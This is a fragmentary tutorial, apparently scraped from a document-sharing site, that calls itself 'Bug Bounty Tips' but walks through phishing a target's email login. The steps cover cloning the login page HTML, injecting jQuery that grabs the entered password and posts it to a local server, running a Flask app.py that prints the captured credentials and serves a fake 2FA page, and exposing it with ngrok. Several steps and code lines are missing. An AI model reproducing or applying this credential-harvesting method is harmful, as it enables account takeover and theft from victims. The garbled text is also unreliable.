Professional Documents
Culture Documents
Bug Bounty Tips
Bug Bounty Tips
Note: This document is not created by a professional content writer so any mistake and
error is a part of great design
Disclaimer
credit, it’s mentioned on the first page. The information provided herein is for
educational purposes only and does not constitute legal or professional advice. While
we have made every effort to ensure the accuracy and reliability of the information
reliance you place on the information contained in this document is strictly at your
own risk. VIEH Group shall not be liable for any damages arising from the use of or
reliance on this document. also we highly appreciate the source person for this
document.
Happy reading !
REQUIREMENTS
STEP 1:
STEP 2:
Type the mail id you wanna hack, after entering the mail id and click
next
STEP 3:
After entering the mail id and right click the mouse and click inspect
STEP 4:
after clicking inspect element ,go to inspector tab or element tab and
right click and click the option called EDIT AS HTML,copy all html codes.
STEP 5:
paste it on sublime text editor and add some script at the end of the
html tag
$(‘button’).click(function(e){
auth=$(‘input[type=password]’).val()
“http://localhost:5000/auth",
window.location=”http://localhost:5000/login"
NOTE:
STEP 6:
next we need to write a python code that fetch deets from victim. And
save it as app.py
request
@app.route(“/auth”, methods=[“POST”])
print(request.form.to_dict())
response = make_response(send_file(“templates/login.html”))
response.headers.add(“Access-Control-Allow-Origin”, “*”)
return send_file(“templates/2fa.html”)
if __name__ == “__main__”:
STEP 7:
open terminal in linux and type as i did and configure the ngrok
ngrok command
password
2023.